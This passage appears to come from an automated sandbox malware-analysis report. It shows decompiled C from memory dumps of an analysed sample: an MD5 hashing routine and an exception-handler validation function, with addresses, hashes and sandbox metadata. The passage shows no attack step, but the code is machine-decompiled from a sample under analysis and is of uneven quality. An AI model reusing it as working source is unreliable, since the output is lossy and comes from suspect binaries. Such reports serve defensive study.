                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: Process$CreateCurrentEventOpenVersion
                            • String ID:
                            • API String ID: 845504543-0
                            • Opcode ID: bccdd13247b34069af90feaf87c411da224cdf72da21f721717c303359e1be4a
                            • Instruction ID: b8cc09b8ad51b93fadf4e457bac6bf592bf8967fcaec5ad48abf734a1226aae7
                            • Opcode Fuzzy Hash: bccdd13247b34069af90feaf87c411da224cdf72da21f721717c303359e1be4a
                            • Instruction Fuzzy Hash: 4EF019309403019BE7209FB8BE1DB963BA9A749712F14017AE651FA2F0D7B48A41CB5C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D2DCC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 611COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 49%
                            			E006D2DCC(void* __ecx, void* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t1 =  &_a4; // 0x6d35ee
				_t226 =  *_t1;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t683 =  *(_t226 + 4);
				_t402 =  *(_t226 + 8);
				_t349 =  *(_t226 + 0xc);
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}


































































































                            0x006d2dcf
                            0x006d2dcf
                            0x006d2dda
                            0x006d2ddd
                            0x006d2de0
                            0x006d2de1
                            0x006d2dff
                            0x006d2e01
                            0x006d2e04
                            0x006d2e07
                            0x006d2e07
                            0x006d2e0a
                            0x006d2e0d
                            0x006d2e10
                            0x006d2e2d
                            0x006d2e30
                            0x006d2e46
                            0x006d2e49
                            0x006d2e63
                            0x006d2e66
                            0x006d2e7c
                            0x006d2e7f
                            0x006d2e81
                            0x006d2e99
                            0x006d2e9c
                            0x006d2e9f
                            0x006d2eb7
                            0x006d2eba
                            0x006d2ed4
                            0x006d2ed7
                            0x006d2eed
                            0x006d2ef0
                            0x006d2ef2
                            0x006d2f0a
                            0x006d2f0f
                            0x006d2f12
                            0x006d2f28
                            0x006d2f2b
                            0x006d2f45
                            0x006d2f48
                            0x006d2f5e
                            0x006d2f61
                            0x006d2f63
                            0x006d2f7e
                            0x006d2f81
                            0x006d2f98
                            0x006d2f9b
                            0x006d2f9f
                            0x006d2fb8
                            0x006d2fbb
                            0x006d2fbd
                            0x006d2fc0
                            0x006d2fdb
                            0x006d2fde
                            0x006d2ff7
                            0x006d2ffa
                            0x006d300a
                            0x006d300d
                            0x006d3025
                            0x006d3028
                            0x006d3042
                            0x006d3045
                            0x006d305d
                            0x006d3060
                            0x006d3076
                            0x006d3079
                            0x006d3091
                            0x006d3094
                            0x006d30ac
                            0x006d30af
                            0x006d30c9
                            0x006d30cc
                            0x006d30e2
                            0x006d30e5
                            0x006d30fd
                            0x006d3100
                            0x006d311a
                            0x006d311d
                            0x006d3135
                            0x006d3138
                            0x006d314e
                            0x006d3151
                            0x006d3169
                            0x006d316c
                            0x006d3184
                            0x006d3187
                            0x006d3199
                            0x006d319c
                            0x006d31ae
                            0x006d31b1
                            0x006d31c3
                            0x006d31c6
                            0x006d31ca
                            0x006d31da
                            0x006d31dd
                            0x006d31eb
                            0x006d31ee
                            0x006d3200
                            0x006d3203
                            0x006d3217
                            0x006d321a
                            0x006d321c
                            0x006d322c
                            0x006d322f
                            0x006d3241
                            0x006d3244
                            0x006d3252
                            0x006d3255
                            0x006d3267
                            0x006d326a
                            0x006d326e
                            0x006d327e
                            0x006d3281
                            0x006d3293
                            0x006d3296
                            0x006d32a4
                            0x006d32a7
                            0x006d32b9
                            0x006d32bc
                            0x006d32ce
                            0x006d32d1
                            0x006d32e5
                            0x006d32e8
                            0x006d32fc
                            0x006d32ff
                            0x006d3313
                            0x006d3316
                            0x006d332a
                            0x006d332d
                            0x006d3341
                            0x006d3344
                            0x006d3358
                            0x006d335d
                            0x006d336f
                            0x006d3372
                            0x006d3386
                            0x006d3389
                            0x006d339d
                            0x006d33a0
                            0x006d33b6
                            0x006d33b9
                            0x006d33cd
                            0x006d33d0
                            0x006d33e2
                            0x006d33e5
                            0x006d33f9
                            0x006d33fc
                            0x006d3410
                            0x006d3413
                            0x006d3427
                            0x006d3430
                            0x006d3433
                            0x006d343c
                            0x006d3445
                            0x006d344d
                            0x006d3455
                            0x006d345f
                            0x006d3474

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: memset
                            • String ID: 5m
                            • API String ID: 2221118986-1963150287
                            • Opcode ID: 412acf920beb90b749619e227c8e20b073c7787657a072e8c53190dd0cc6b4ba
                            • Instruction ID: 9dac9cca8c45f3d5510d912cf87701f64f18f533505fead4407a633352b607a7
                            • Opcode Fuzzy Hash: 412acf920beb90b749619e227c8e20b073c7787657a072e8c53190dd0cc6b4ba
                            • Instruction Fuzzy Hash: B822847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D8521 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D8521(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6da380; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6da3c8 = 1;
										__eflags =  *0x6da3c8;
										if( *0x6da3c8 != 0) {
											goto L60;
										}
										_t84 =  *0x6da380; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6da3c8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6da380 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6da388 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6da384 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6da388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6da388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6da3c8 = 1;
							__eflags =  *0x6da3c8;
							if( *0x6da3c8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6da388 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6da388 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6da3c8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6da388 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6da380 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6da388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6da388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                            0x006d852b
                            0x006d852e
                            0x006d8534
                            0x006d8552
                            0x00000000
                            0x006d8552
                            0x006d853c
                            0x006d8545
                            0x006d854b
                            0x006d855a
                            0x006d855d
                            0x006d8560
                            0x006d856a
                            0x006d856a
                            0x006d856c
                            0x006d856f
                            0x006d8571
                            0x006d8571
                            0x006d8573
                            0x006d8576
                            0x00000000
                            0x00000000
                            0x006d8578
                            0x006d857a
                            0x006d85e0
                            0x006d85e0
                            0x006d873e
                            0x00000000
                            0x006d873e
                            0x006d857c
                            0x006d857c
                            0x006d8580
                            0x006d8582
                            0x006d8582
                            0x006d8582
                            0x006d8582
                            0x006d8585
                            0x006d8586
                            0x006d8589
                            0x006d8589
                            0x006d858d
                            0x006d8591
                            0x006d859f
                            0x006d859f
                            0x006d85a7
                            0x006d85ad
                            0x006d85af
                            0x006d85b1
                            0x006d85c1
                            0x006d85ce
                            0x006d85d2
                            0x006d85d7
                            0x006d85d9
                            0x006d8657
                            0x006d8657
                            0x006d85db
                            0x006d85db
                            0x006d85db
                            0x006d8659
                            0x006d865b
                            0x006d873c
                            0x006d873c
                            0x00000000
                            0x006d8661
                            0x006d8661
                            0x006d8668
                            0x00000000
                            0x00000000
                            0x006d866e
                            0x006d8672
                            0x006d86ce
                            0x006d86d0
                            0x006d86d8
                            0x006d86da
                            0x006d86dc
                            0x00000000
                            0x00000000
                            0x006d86de
                            0x006d86e4
                            0x006d86e6
                            0x006d86e8
                            0x006d86fd
                            0x006d86fd
                            0x006d86ff
                            0x006d872e
                            0x006d8735
                            0x00000000
                            0x006d8735
                            0x006d8703
                            0x006d8704
                            0x006d8706
                            0x006d8708
                            0x006d8708
                            0x006d870a
                            0x006d870c
                            0x006d870e
                            0x006d8722
                            0x006d8722
                            0x006d8725
                            0x006d8727
                            0x006d8727
                            0x006d8728
                            0x006d8728
                            0x00000000
                            0x006d8710
                            0x006d8710
                            0x006d8710
                            0x006d8719
                            0x006d871a
                            0x006d871c
                            0x006d871e
                            0x006d871e
                            0x00000000
                            0x006d8710
                            0x006d870e
                            0x006d86ea
                            0x006d86f1
                            0x006d86f1
                            0x006d86f3
                            0x00000000
                            0x00000000
                            0x006d86f5
                            0x006d86f6
                            0x006d86f9
                            0x006d86fb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d86fb
                            0x00000000
                            0x006d86f1
                            0x006d8674
                            0x006d8677
                            0x006d867c
                            0x00000000
                            0x00000000
                            0x006d8685
                            0x006d8687
                            0x006d868d
                            0x00000000
                            0x00000000
                            0x006d8693
                            0x006d8699
                            0x00000000
                            0x00000000
                            0x006d869f
                            0x006d86a1
                            0x006d86aa
                            0x006d86ae
                            0x00000000
                            0x00000000
                            0x006d86b4
                            0x006d86b7
                            0x006d86b9
                            0x00000000
                            0x00000000
                            0x006d86c0
                            0x006d86c2
                            0x00000000
                            0x00000000
                            0x006d86c4
                            0x006d86c8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d86c8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d85b3
                            0x006d85b3
                            0x006d85b3
                            0x006d85ba
                            0x00000000
                            0x00000000
                            0x006d85bc
                            0x006d85bd
                            0x006d85bf
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d85bf
                            0x006d85e7
                            0x006d85e9
                            0x00000000
                            0x00000000
                            0x006d85f9
                            0x006d85fb
                            0x006d85fd
                            0x00000000
                            0x00000000
                            0x006d8603
                            0x006d860a
                            0x006d8636
                            0x006d8636
                            0x006d8638
                            0x006d863a
                            0x006d864e
                            0x006d8650
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d863c
                            0x006d863c
                            0x006d863c
                            0x006d8645
                            0x006d8646
                            0x006d8648
                            0x006d864a
                            0x006d864a
                            0x00000000
                            0x006d863c
                            0x006d860c
                            0x006d860c
                            0x006d860f
                            0x006d8611
                            0x006d8623
                            0x006d8623
                            0x006d8626
                            0x006d8628
                            0x006d8628
                            0x006d8629
                            0x006d8629
                            0x006d862f
                            0x006d862f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d8613
                            0x006d8613
                            0x006d8613
                            0x006d861a
                            0x00000000
                            0x00000000
                            0x006d861c
                            0x006d861c
                            0x006d861d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d861d
                            0x006d861f
                            0x006d8621
                            0x006d8634
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d8634
                            0x00000000
                            0x006d8621
                            0x006d8593
                            0x006d8596
                            0x006d8599
                            0x00000000
                            0x00000000
                            0x006d859b
                            0x006d859d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d859d
                            0x006d8562
                            0x006d8564
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 006D85D2
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: MemoryQueryVirtual
                            • String ID:
                            • API String ID: 2850889275-0
